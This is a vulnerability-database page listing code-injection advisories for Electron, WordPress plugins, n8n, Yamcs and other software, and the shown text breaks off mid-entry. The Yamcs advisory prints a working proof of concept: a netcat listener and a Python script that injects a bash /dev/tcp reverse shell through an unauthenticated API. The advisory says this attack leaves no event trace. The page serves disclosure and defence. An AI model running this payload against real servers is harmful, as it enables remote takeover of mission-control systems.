Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8307 vulnerabilities reference this CWE, most recent first.

GHSA-VMQJ-WP2G-3JP7

Vulnerability from github – Published: 2023-01-22 09:30 – Updated: 2025-04-02 18:30
VLAI
Details

Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-24059"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-22T07:15:00Z",
    "severity": "HIGH"
  },
  "details": "Grand Theft Auto V for PC allows attackers to achieve partial remote code execution or modify files on a PC, as exploited in the wild in January 2023.",
  "id": "GHSA-vmqj-wp2g-3jp7",
  "modified": "2025-04-02T18:30:38Z",
  "published": "2023-01-22T09:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24059"
    },
    {
      "type": "WEB",
      "url": "https://support.rockstargames.com/community/200063373/13249062368147"
    },
    {
      "type": "WEB",
      "url": "https://support.rockstargames.com/community/200063373/13252523900819"
    },
    {
      "type": "WEB",
      "url": "https://twitter.com/TezFunz2/status/1616575783215964166"
    },
    {
      "type": "WEB",
      "url": "https://www.reddit.com/r/gtaonline/comments/10hsosu/mass_reporting_the_dangerous_pc_exploit"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VMQV-HX8Q-J7MG

Vulnerability from github – Published: 2025-09-03 21:27 – Updated: 2025-09-05 16:10
VLAI
Summary
Electron has ASAR Integrity Bypass via resource modification
Details

Impact

This only impacts apps that have the embeddedAsarIntegrityValidation and onlyLoadAppFromAsar fuses enabled. Apps without these fuses enabled are not impacted.

Specifically this issue can only be exploited if your app is launched from a filesystem the attacker has write access too. i.e. the ability to edit files inside the resources folder in your app installation on Windows which these fuses are supposed to protect against.

Workarounds

There are no app side workarounds, you must update to a patched version of Electron.

Fixed Versions

  • 38.0.0-beta.6
  • 37.3.1
  • 36.8.1
  • 35.7.5

For more information

If you have any questions or comments about this advisory, email us at security@electronjs.org

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "35.7.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "36.0.0-alpha.1"
            },
            {
              "fixed": "36.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "37.0.0-alpha.1"
            },
            {
              "fixed": "37.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "electron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "38.0.0-alpha.1"
            },
            {
              "fixed": "38.0.0-beta.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55305"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-03T21:27:37Z",
    "nvd_published_at": "2025-09-04T23:15:33Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nThis only impacts apps that have the `embeddedAsarIntegrityValidation` and `onlyLoadAppFromAsar` [fuses](https://www.electronjs.org/docs/latest/tutorial/fuses) enabled.  Apps without these fuses enabled are not impacted.\n\nSpecifically this issue can only be exploited if your app is launched from a filesystem the attacker has write access too.  i.e. the ability to edit files inside the `resources` folder in your app installation on Windows which these fuses are supposed to protect against.\n\n### Workarounds\nThere are no app side workarounds, you must update to a patched version of Electron.\n\n### Fixed Versions\n* `38.0.0-beta.6`\n* `37.3.1`\n* `36.8.1`\n* `35.7.5`\n\n### For more information\nIf you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org)",
  "id": "GHSA-vmqv-hx8q-j7mg",
  "modified": "2025-09-05T16:10:10Z",
  "published": "2025-09-03T21:27:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/security/advisories/GHSA-vmqv-hx8q-j7mg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55305"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/pull/48101"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/pull/48102"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/pull/48103"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/pull/48104"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/commit/23a02934510fcf951428e14573d9b2d2a3c4f28b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/commit/2e5a0b7220ebf955c6785cc5adb2e2b1cf77dac1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/commit/3f92511cdecc39f46b0e86cce40a0c691e301c9d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/electron/electron/commit/fdf29ce83870109d403f5c23ae529dbd0e8f4fee"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/electron/electron"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Electron has ASAR Integrity Bypass via resource modification"
}

GHSA-VMVC-HM7F-CF66

Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-28 18:30
VLAI
Details

Improper Control of Generation of Code ('Code Injection') vulnerability in Vollstart Event Tickets with Ticket Scanner event-tickets-with-ticket-scanner allows Code Injection.This issue affects Event Tickets with Ticket Scanner: from n/a through <= 2.8.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-68015"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T17:16:07Z",
    "severity": "CRITICAL"
  },
  "details": "Improper Control of Generation of Code (\u0027Code Injection\u0027) vulnerability in Vollstart Event Tickets with Ticket Scanner event-tickets-with-ticket-scanner allows Code Injection.This issue affects Event Tickets with Ticket Scanner: from n/a through \u003c= 2.8.3.",
  "id": "GHSA-vmvc-hm7f-cf66",
  "modified": "2026-01-28T18:30:42Z",
  "published": "2026-01-22T18:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68015"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/event-tickets-with-ticket-scanner/vulnerability/wordpress-event-tickets-with-ticket-scanner-plugin-2-7-10-remote-code-execution-rce-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VMWH-G38P-M7Q2

Vulnerability from github – Published: 2021-11-23 00:00 – Updated: 2021-11-24 00:00
VLAI
Details

The middleware component in OX App Suite through 7.10.5 allows Code Injection via Java classes in a YAML format.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-33493"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-22T09:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The middleware component in OX App Suite through 7.10.5 allows Code Injection via Java classes in a YAML format.",
  "id": "GHSA-vmwh-g38p-m7q2",
  "modified": "2021-11-24T00:00:46Z",
  "published": "2021-11-23T00:00:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33493"
    },
    {
      "type": "WEB",
      "url": "https://open-xchange.com"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/fulldisclosure/2021/Nov/42"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/165028/OX-App-Suite-Ox-Documents-7.10.x-XSS-Code-Injection-Traversal.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-VMWP-VH32-RJ75

Vulnerability from github – Published: 2026-05-27 22:45 – Updated: 2026-05-27 22:45
VLAI
Summary
Yamcs Vulnerable to Remote Code Execution via Mission Database algorithm override
Details

Remote Code Execution via Mission Database algorithm override

Summary

The Nashorn ScriptEngine used to evaluate user-supplied algorithm text in MdbOverrideApi.updateAlgorithm is constructed without a ClassFilter, allowing a user with the ChangeMissionDatabase privilege to execute arbitrary Java code on the Yamcs server. In Yamcs's default configuration (no security.yaml), the built-in guest user has superuser=true, so the vulnerability is reachable without authentication.

Details

Vulnerable file: yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java

// L46-53  Nashorn engine obtained without a ClassFilter
ScriptEngineFactory factory = scriptEngineManager.getEngineFactories().stream()
        .filter(candidate -> !JDK_BUILTIN_NASHORN_ENGINE_NAME.equals(candidate.getEngineName())
                && candidate.getNames().contains(language))
        .findFirst().orElse(null);
if (factory != null) {
    scriptEngine = factory.getScriptEngine();          // ← ClassFilter not supplied
}

// L109  user-supplied algorithm text reaches eval()
scriptEngine.eval(functionScript);

NashornScriptEngineFactory.getScriptEngine() accepts an optional ClassFilter that restricts which classes JavaScript can reach via Java.type(...). Yamcs passes no filter, so attacker-supplied JavaScript can reach any Java class — for example, Java.type("java.lang.Runtime").getRuntime().exec(...) runs arbitrary OS commands inside the Yamcs JVM.

The path from HTTP request to eval is: MdbOverrideApi.updateAlgorithm (yamcs-core/src/main/java/org/yamcs/http/api/MdbOverrideApi.java:145-189) → AlgorithmManager.overrideAlgorithm (yamcs-core/src/main/java/org/yamcs/algorithms/AlgorithmManager.java:529-559) → ScriptAlgorithmExecutorFactory.makeExecutor (yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java:102-117) → scriptEngine.eval(...).

PoC

Run against any reachable Yamcs deployment that has at least one JavaScript CustomAlgorithm in its MDB (the simulator example MDB includes several, such as /YSS/SIMULATOR/Battery_Voltage_Avg).

Attacker-side listener:

nc -lvnp 4444
#!/usr/bin/env python3
"""
Usage: python3 <poc>.py http://target:8090 LHOST LPORT
"""
import json, sys, time, urllib.request

TARGET    = sys.argv[1].rstrip("/")
LHOST     = sys.argv[2]
LPORT     = int(sys.argv[3])
INSTANCE  = "simulator"
PROCESSOR = "realtime"
ALGORITHM = "YSS/SIMULATOR/Battery_Voltage_Avg"

# Close the generated wrapper function with `}`, execute the payload at
# top level, then re-open a dummy function so the trailing `}` emitted
# by ScriptAlgorithmExecutorFactory parses. No throw -> no event fired.
payload = (
    '} '
    'Java.type("java.lang.Runtime").getRuntime().exec('
    f'["bash","-c","exec 3<>/dev/tcp/{LHOST}/{LPORT}; id >&3; sh -i <&3 >&3 2>&3"]); '
    'function _x(){'
)

patch = f"{TARGET}/api/mdb-overrides/{INSTANCE}/{PROCESSOR}/algorithms/{ALGORITHM}"

def http(method, url, body=None):
    req = urllib.request.Request(url, data=json.dumps(body).encode() if body else None,
                                  method=method, headers={"Content-Type": "application/json"})
    return urllib.request.urlopen(req, timeout=10).read()

http("PATCH", patch, {"action": "SET", "algorithm": {"text": payload}})
time.sleep(2)
http("PATCH", patch, {"action": "RESET"})

nashorn-rce-poc

The override path emits events only when evaluation fails: a WARNING from ScriptAlgorithmExecutorFactory.java:112 and a CRITICAL from AlgorithmManager.java:546. Any syntactically valid payload — like the one above — succeeds silently and no event is fired, so the attack leaves no trace in the Yamcs event stream.

Impact

Arbitrary code runs as the OS user running the Yamcs server, leading to compromise of that server and disruption of the mission it controls.

For a Yamcs deployment managing spacecraft operations, an attacker can: - forge or block telecommands, suppress alarms, and tamper with the telemetry archive — disrupting or seizing control of the mission; - read any file the Yamcs process can read (cryptographic keys, credentials, MDB source files, configuration); - pivot to other ground-station systems reachable from the server (TSE instruments, neighboring Yamcs instances, internal services); - install a persistent backdoor via the same primitive.

Who is impacted: - All Yamcs deployments running in the default configuration (no security.yaml present): any unauthenticated network attacker that can reach the HTTP API port (default 8090). - Yamcs deployments with security enabled: any user that has been granted the ChangeMissionDatabase system privilege. This privilege is commonly given to MDB engineers and operators who edit calibrators or thresholds; the vulnerability turns that privilege into arbitrary code execution on the server.

Affected Versions

All Yamcs releases that ship the algorithm override endpoint are affected — no ClassFilter has ever been applied to the script engine.

  • First vulnerable release: yamcs-4.7.3 (2018-11-22). Introduced in commit 951e505d18a3912813b59edc685cbcbd4c609906 ("added possibility to change in a running processor alarms, calibrations and algorithms texts"). The commit added the ChangeAlgorithmRequest RPC (later renamed UpdateAlgorithmRequest) and routed it as PATCH /api/mdb/{instance}/{processor}/algorithms/{name*}.
  • Routing change at yamcs-5.5.0 (2021-04): the endpoint was split out of MdbApi into MdbOverrideApi and moved to PATCH /api/mdb-overrides/{instance}/{processor}/algorithms/{name*}. The underlying scriptEngine.eval(...) sink and the missing ClassFilter are identical.
  • Latest release: yamcs-5.12.6 (commit f1a26fe54587fab9960d7e53fc1bf0c879220e9e) is affected. These four files (MdbOverrideApi.java, AlgorithmManager.java, ScriptAlgorithmExecutorFactory.java, SecurityStore.java) are unchanged between 5.12.6 and current master (96d3e2d474415bea859f40ecbddc1bb8a0d141c1) — no upstream fix exists.

In short: every Yamcs release from 4.7.3 through 5.12.6, plus current master, is vulnerable (133 release tags spanning 2018-11-22 to present).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.yamcs:yamcs-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.12.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46562"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470",
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-27T22:45:49Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "# Remote Code Execution via Mission Database algorithm override\n\n## Summary\n\nThe Nashorn `ScriptEngine` used to evaluate user-supplied algorithm text in `MdbOverrideApi.updateAlgorithm` is constructed without a `ClassFilter`, allowing a user with the `ChangeMissionDatabase` privilege to execute arbitrary Java code on the Yamcs server. In Yamcs\u0027s default configuration (no `security.yaml`), the built-in `guest` user has `superuser=true`, so the vulnerability is reachable without authentication.\n\n## Details\n\n**Vulnerable file**: `yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java`\n\n```java\n// L46-53  Nashorn engine obtained without a ClassFilter\nScriptEngineFactory factory = scriptEngineManager.getEngineFactories().stream()\n        .filter(candidate -\u003e !JDK_BUILTIN_NASHORN_ENGINE_NAME.equals(candidate.getEngineName())\n                \u0026\u0026 candidate.getNames().contains(language))\n        .findFirst().orElse(null);\nif (factory != null) {\n    scriptEngine = factory.getScriptEngine();          // \u2190 ClassFilter not supplied\n}\n\n// L109  user-supplied algorithm text reaches eval()\nscriptEngine.eval(functionScript);\n```\n\n`NashornScriptEngineFactory.getScriptEngine()` accepts an optional `ClassFilter` that restricts which classes JavaScript can reach via `Java.type(...)`. Yamcs passes no filter, so attacker-supplied JavaScript can reach any Java class \u2014 for example, `Java.type(\"java.lang.Runtime\").getRuntime().exec(...)` runs arbitrary OS commands inside the Yamcs JVM.\n\nThe path from HTTP request to `eval` is:\n`MdbOverrideApi.updateAlgorithm` (`yamcs-core/src/main/java/org/yamcs/http/api/MdbOverrideApi.java:145-189`)\n\u2192 `AlgorithmManager.overrideAlgorithm` (`yamcs-core/src/main/java/org/yamcs/algorithms/AlgorithmManager.java:529-559`)\n\u2192 `ScriptAlgorithmExecutorFactory.makeExecutor` (`yamcs-core/src/main/java/org/yamcs/algorithms/ScriptAlgorithmExecutorFactory.java:102-117`)\n\u2192 `scriptEngine.eval(...)`.\n\n## PoC\n\nRun against any reachable Yamcs deployment that has at least one JavaScript `CustomAlgorithm` in its MDB (the `simulator` example MDB includes several, such as `/YSS/SIMULATOR/Battery_Voltage_Avg`).\n\nAttacker-side listener:\n```\nnc -lvnp 4444\n```\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nUsage: python3 \u003cpoc\u003e.py http://target:8090 LHOST LPORT\n\"\"\"\nimport json, sys, time, urllib.request\n\nTARGET    = sys.argv[1].rstrip(\"/\")\nLHOST     = sys.argv[2]\nLPORT     = int(sys.argv[3])\nINSTANCE  = \"simulator\"\nPROCESSOR = \"realtime\"\nALGORITHM = \"YSS/SIMULATOR/Battery_Voltage_Avg\"\n\n# Close the generated wrapper function with `}`, execute the payload at\n# top level, then re-open a dummy function so the trailing `}` emitted\n# by ScriptAlgorithmExecutorFactory parses. No throw -\u003e no event fired.\npayload = (\n    \u0027} \u0027\n    \u0027Java.type(\"java.lang.Runtime\").getRuntime().exec(\u0027\n    f\u0027[\"bash\",\"-c\",\"exec 3\u003c\u003e/dev/tcp/{LHOST}/{LPORT}; id \u003e\u00263; sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\"]); \u0027\n    \u0027function _x(){\u0027\n)\n\npatch = f\"{TARGET}/api/mdb-overrides/{INSTANCE}/{PROCESSOR}/algorithms/{ALGORITHM}\"\n\ndef http(method, url, body=None):\n    req = urllib.request.Request(url, data=json.dumps(body).encode() if body else None,\n                                  method=method, headers={\"Content-Type\": \"application/json\"})\n    return urllib.request.urlopen(req, timeout=10).read()\n\nhttp(\"PATCH\", patch, {\"action\": \"SET\", \"algorithm\": {\"text\": payload}})\ntime.sleep(2)\nhttp(\"PATCH\", patch, {\"action\": \"RESET\"})\n```\n\n\u003cimg width=\"1841\" height=\"881\" alt=\"nashorn-rce-poc\" src=\"https://github.com/user-attachments/assets/48432eea-67b5-4f3b-af97-c77325b0d671\" /\u003e\u003cbr\u003e\n\nThe override path emits events only when evaluation fails: a `WARNING` from `ScriptAlgorithmExecutorFactory.java:112` and a `CRITICAL` from `AlgorithmManager.java:546`. Any syntactically valid payload \u2014 like the one above \u2014 succeeds silently and **no event is fired**, so the attack leaves no trace in the Yamcs event stream.\n\n## Impact\nArbitrary code runs as the OS user running the Yamcs server, leading to compromise of that server and disruption of the mission it controls.\n\nFor a Yamcs deployment managing spacecraft operations, an attacker can:\n- forge or block telecommands, suppress alarms, and tamper with the telemetry archive \u2014 disrupting or seizing control of the mission;\n- read any file the Yamcs process can read (cryptographic keys, credentials, MDB source files, configuration);\n- pivot to other ground-station systems reachable from the server (TSE instruments, neighboring Yamcs instances, internal services);\n- install a persistent backdoor via the same primitive.\n\nWho is impacted:\n- **All Yamcs deployments running in the default configuration** (no `security.yaml` present): any unauthenticated network attacker that can reach the HTTP API port (default `8090`).\n- **Yamcs deployments with security enabled**: any user that has been granted the `ChangeMissionDatabase` system privilege. This privilege is commonly given to MDB engineers and operators who edit calibrators or thresholds; the vulnerability turns that privilege into arbitrary code execution on the server.\n\n## Affected Versions\n\nAll Yamcs releases that ship the algorithm override endpoint are affected \u2014 no `ClassFilter` has ever been applied to the script engine.\n\n- **First vulnerable release**: `yamcs-4.7.3` (2018-11-22). Introduced in commit `951e505d18a3912813b59edc685cbcbd4c609906` (\"added possibility to change in a running processor alarms, calibrations and algorithms texts\"). The commit added the `ChangeAlgorithmRequest` RPC (later renamed `UpdateAlgorithmRequest`) and routed it as `PATCH /api/mdb/{instance}/{processor}/algorithms/{name*}`.\n- **Routing change at `yamcs-5.5.0`** (2021-04): the endpoint was split out of `MdbApi` into `MdbOverrideApi` and moved to `PATCH /api/mdb-overrides/{instance}/{processor}/algorithms/{name*}`. The underlying `scriptEngine.eval(...)` sink and the missing `ClassFilter` are identical.\n- **Latest release**: `yamcs-5.12.6` (commit `f1a26fe54587fab9960d7e53fc1bf0c879220e9e`) is affected. These four files (`MdbOverrideApi.java`, `AlgorithmManager.java`, `ScriptAlgorithmExecutorFactory.java`, `SecurityStore.java`) are unchanged between `5.12.6` and current `master` (`96d3e2d474415bea859f40ecbddc1bb8a0d141c1`) \u2014 no upstream fix exists.\n\nIn short: **every Yamcs release from `4.7.3` through `5.12.6`, plus current `master`, is vulnerable** (133 release tags spanning 2018-11-22 to present).",
  "id": "GHSA-vmwp-vh32-rj75",
  "modified": "2026-05-27T22:45:49Z",
  "published": "2026-05-27T22:45:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/yamcs/yamcs/security/advisories/GHSA-vmwp-vh32-rj75"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/yamcs/yamcs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Yamcs Vulnerable to Remote Code Execution via Mission Database algorithm override"
}

GHSA-VP3M-WWP8-X3HF

Vulnerability from github – Published: 2022-03-11 00:02 – Updated: 2022-03-18 00:01
VLAI
Details

The absence of filters when loading some sections in the web application of the vulnerable device allows attackers to inject malicious code that will be interpreted when a legitimate user accesses the web section where the information is displayed. Injection can be done on specific parameters. The injected code is executed when a legitimate user attempts to upload, copy, download, or delete an existing configuration (Administrative Services).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-24915"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-10T17:46:00Z",
    "severity": "HIGH"
  },
  "details": "The absence of filters when loading some sections in the web application of the vulnerable device allows attackers to inject malicious code that will be interpreted when a legitimate user accesses the web section where the information is displayed. Injection can be done on specific parameters. The injected code is executed when a legitimate user attempts to upload, copy, download, or delete an existing configuration (Administrative Services).",
  "id": "GHSA-vp3m-wwp8-x3hf",
  "modified": "2022-03-18T00:01:21Z",
  "published": "2022-03-11T00:02:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24915"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-062-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VP4R-H765-5MWP

Vulnerability from github – Published: 2023-02-17 03:30 – Updated: 2023-02-28 14:37
VLAI
Summary
Code Injection in froxlor/froxlor
Details

Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-0877"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-02-17T20:54:40Z",
    "nvd_published_at": "2023-02-17T01:15:00Z",
    "severity": "HIGH"
  },
  "details": "Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.",
  "id": "GHSA-vp4r-h765-5mwp",
  "modified": "2023-02-28T14:37:17Z",
  "published": "2023-02-17T03:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0877"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/commit/aa48ffca2bcaf7ae57be3b8147bb3138abdab984"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Froxlor/Froxlor"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Code Injection in froxlor/froxlor"
}

GHSA-VP63-F79X-PVWJ

Vulnerability from github – Published: 2025-05-06 06:30 – Updated: 2025-05-06 06:30
VLAI
Details

The LayoutBoxx plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-2802"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-06T05:15:49Z",
    "severity": "HIGH"
  },
  "details": "The LayoutBoxx plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.",
  "id": "GHSA-vp63-f79x-pvwj",
  "modified": "2025-05-06T06:30:37Z",
  "published": "2025-05-06T06:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2802"
    },
    {
      "type": "WEB",
      "url": "https://plugins.svn.wordpress.org/layoutboxx/trunk/layoutboxx.php"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/layoutboxx/#developers"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fc3fcb8f-f130-4008-8f11-d98efa30f1a8?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VP68-3MMV-QRFM

Vulnerability from github – Published: 2022-05-17 03:14 – Updated: 2024-03-21 03:33
VLAI
Details

** DISPUTED ** WampServer 3.0.6 has two files called 'wampmanager.exe' and 'unins000.exe' with a weak ACL for Modify. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. To properly exploit this vulnerability, the local attacker must insert an executable file called wampmanager.exe or unins000.exe and replace the original files. The next time one of these programs is launched by a more privileged user, malicious code chosen by the local attacker will run. NOTE: the vendor disputes the relevance of this report, taking the position that a configuration in which "'someone' (an attacker) is able to replace files on a PC" is not "the fault of WampServer."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-10072"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-12-27T07:59:00Z",
    "severity": "HIGH"
  },
  "details": "** DISPUTED ** WampServer 3.0.6 has two files called \u0027wampmanager.exe\u0027 and \u0027unins000.exe\u0027 with a weak ACL for Modify. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. To properly exploit this vulnerability, the local attacker must insert an executable file called wampmanager.exe or unins000.exe and replace the original files. The next time one of these programs is launched by a more privileged user, malicious code chosen by the local attacker will run. NOTE: the vendor disputes the relevance of this report, taking the position that a configuration in which \"\u0027someone\u0027 (an attacker) is able to replace files on a PC\" is not \"the fault of WampServer.\"",
  "id": "GHSA-vp68-3mmv-qrfm",
  "modified": "2024-03-21T03:33:12Z",
  "published": "2022-05-17T03:14:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10072"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/138948/wampserver306-insecure.txt"
    },
    {
      "type": "WEB",
      "url": "http://forum.wampserver.com/read.php?2%2C144473"
    },
    {
      "type": "WEB",
      "url": "http://forum.wampserver.com/read.php?2,144473"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VPCF-GVG4-6QWR

Vulnerability from github – Published: 2026-02-25 22:05 – Updated: 2026-02-27 21:51
VLAI
Summary
n8n: Expression Sandbox Escape Leads to RCE
Details

Impact

Additional exploits in the expression evaluation of n8n have been identified and patched following CVE-2025-68613. An authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n.

Patches

The issues have been fixed in n8n versions 2.10.1, 2.9.3, and 1.123.22. Users should upgrade to one of these versions or later to remediate all known vulnerabilities.

Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit workflow creation and editing permissions to fully trusted users only. - Deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Resources

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.123.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
